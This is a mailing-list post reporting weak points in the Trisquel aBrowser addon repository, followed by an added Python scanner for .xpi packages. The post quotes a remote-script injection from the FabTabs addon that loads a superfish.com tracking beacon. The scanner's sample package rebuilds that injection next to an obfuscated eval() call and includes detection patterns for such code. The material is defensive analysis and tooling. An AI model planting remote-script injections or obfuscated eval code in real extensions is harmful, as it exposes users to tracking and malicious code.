[Trisquel-devel] Trisquel addon repository has security risks

Luke gaming4jc2 at yahoo.com
Sun Jan 5 19:41:37 CET 2014


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Friendly reminder: FabTab addon is still up and this is still an issue.

On 12/01/13 12:51, Luke wrote:
> Hello, I have noticed that the Trisquel aBrowser addon repository
> is susceptible to several threat vectors.
> 
> 1) Random users signing up and changing the download location of
> .xpi files. This could be used to inject malicious code to
> unknowing users.
> 
> Solution: a) Assign moderators who will check addons for approval
> similar to AMO before going live.
> 
> b) Whitelist certain domains, e.g. only allow the URL to contain
> download links from "https://addons.mozilla.org" since they are
> generally being checked by others.
> 
> 2) Non-free blobs can still exist in supposedly free code and must
> be reviewed. Taking for example a recent finding in FabTabs:
> https://trisquel.info/en/browser/addons/fabtabs
> 
> While manually inspecting the code I found this interesting line
> located in "/chrome/content/fabtab/content.js":
>
> script.src = 'http://www.superfish.com/ws/sf_main.jsp?dlsource=fgzqxwui&userId=c4aa8323-83ff-4385-a2df-d45f8c1ce97a&CTID=fabtab';
>
> This code appears to be a web beacon and directly links to
> non-free code outside of the original xpi! Thankfully this outside
> code appears only to have analytics/tracking built in and not actual
> malicious intent other than ensuring HTTPS is OFF whenever it
> queries the beacon (contains URL rewrites). However this opens the
> door for much larger problems. Someone should be proactively
> studying extensions prior to upload, and/or implement a small
> filter which can catch certain artifacts at minimum.
> 
> One such make-shift bash script I whipped up (could use some
> work):
>
> # loop so that each .xpi is opened as an archive (unzip -p with several
> # file arguments would treat the rest as member names); -a greps binary members too
> for f in *.xpi; do unzip -p "$f" | grep -a "http://\|https://\|eval(base64_decode"; done
> 
> This outputs all links and any base64 found inside of an xpi to
> the terminal, and can catch the superfish web beacon.
> 
> 
> Just some thoughts. :)

-----BEGIN PGP SIGNATURE-----

iQEcBAEBAgAGBQJSyadhAAoJEJ6DCuZ5py6jnzwH/3dkPrdGjgMToZLpBVobr8JJ
p2gf8OCZVWnzm1MYASjcwHlND/JIuPbbwnOiiXagPZZahF0oZAdO608oyyM5dee+
hjQdQoQXmrsoI1uB5T0AXJH1/4fBROxJkslWJyMkYJUigqUnfLpxLUAPLQGzx0Ke
x8Wlx10s/viXhHeo7upldqz0kxEXKoh4yhLHFyFXJgZu+1Xf7mMVssowCMdhbhSU
qh47YWSItkRR/3mWBHOWnzxbDGVuEAf5vhLCv8qKu9mIR4y92iyYMCkZq+qXxYOH
2tF2yPq/o2e3IIk78SszjN4fRpeYbrGTtftxY+J9GLa/hYL8kv6nk80yfNlyJKY=
=cgDN
-----END PGP SIGNATURE-----
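The following is an added example (not code from the message above, and not part of Trisquel's addon repository) of the two checks the message asks for: a static scan of an .xpi package for remote script URLs and decoded eval() calls, along the lines of the grep one-liner, plus a host-based allowlist for the repository's download field. It assumes the extension package is a plain zip, and the sample .xpi is constructed in memory (hypothetical member names; the superfish.com URL is the one quoted in the post). The allowlist is checked against the parsed hostname rather than by substring, since a substring test for "addons.mozilla.org" would also accept URLs on other hosts that merely contain that string.

```python
"""Static scanner for .xpi extension packages (added example, not Trisquel code).

Findings are (member name, kind, detail) tuples:
  plaintext-url  http:// URL that can be rewritten in transit
  url            https:// URL
  eval-decoded   eval() fed by base64_decode/atob/unescape (obfuscated code)
"""
import io
import re
import zipfile
from urllib.parse import urlparse

# URLs as they appear in JS/HTML/RDF source; stops at whitespace and quotes.
URL_RE = re.compile(rb"https?://[^\s'\"<>)]+")
# eval() wrapped around a decoder: PHP-style base64_decode (the pattern from
# the post) or the JS equivalents atob()/unescape().
EVAL_DECODE_RE = re.compile(rb"eval\s*\(\s*(?:base64_decode|atob|unescape)\s*\(")

# Hosts from which the repository's "download location" field may point.
ALLOWED_DOWNLOAD_HOSTS = {"addons.mozilla.org"}


def scan_xpi_bytes(data):
    """Scan every member of an .xpi (given as bytes) and return the findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            blob = z.read(name)
            for m in URL_RE.finditer(blob):
                url = m.group(0).decode("ascii", "replace")
                kind = "plaintext-url" if url.startswith("http://") else "url"
                findings.append((name, kind, url))
            for m in EVAL_DECODE_RE.finditer(blob):
                findings.append((name, "eval-decoded",
                                 m.group(0).decode("ascii", "replace")))
    return findings


def needs_review(findings):
    """True if anything was found that a moderator should look at by hand."""
    return any(kind in ("plaintext-url", "eval-decoded") for _, kind, _ in findings)


def download_url_allowed(url, allowed_hosts=ALLOWED_DOWNLOAD_HOSTS):
    """Allowlist check for a user-supplied download location.

    Requires https and an exact hostname match.  Note that
    'addons.mozilla.org' in url would wrongly accept
    https://addons.mozilla.org.example.net/ or
    https://addons.mozilla.org@example.net/ (userinfo trick).
    """
    p = urlparse(url)
    return p.scheme == "https" and p.hostname in allowed_hosts


def build_sample_xpi():
    """Constructed sample package (hypothetical member names) containing a
    remote <script> injection like the one described in the post, an
    obfuscated eval(), and one harmless https reference."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("install.rdf", "<RDF/>")
        z.writestr(
            "chrome/content/fabtab/content.js",
            "var script = document.createElement('script');\n"
            "script.src = 'http://www.superfish.com/ws/sf_main.jsp?"
            "dlsource=fgzqxwui&userId=c4aa8323-83ff-4385-a2df-d45f8c1ce97a&CTID=fabtab';\n"
            "document.head.appendChild(script);\n"
            "eval(atob('YWxlcnQoMSk='));\n")
        z.writestr("chrome/content/clean.js",
                   "fetch('https://addons.mozilla.org/api/');")
    return buf.getvalue()


if __name__ == "__main__":
    results = scan_xpi_bytes(build_sample_xpi())
    for member, kind, detail in results:
        print(f"{kind:14} {member}: {detail}")
    print("needs manual review:", needs_review(results))
    for candidate in ("https://addons.mozilla.org/firefox/addon/fabtabs/",
                      "https://addons.mozilla.org.example.net/fabtabs.xpi",
                      "https://addons.mozilla.org@example.net/fabtabs.xpi"):
        print(candidate, "->", "allowed" if download_url_allowed(candidate) else "rejected")
```

To run it against real packages, replace build_sample_xpi() with the bytes of each .xpi on disk; the scan is purely lexical, so a string built at runtime or a URL split across concatenations will not be caught, which is why the message's suggestion of human review before an addon goes live still applies.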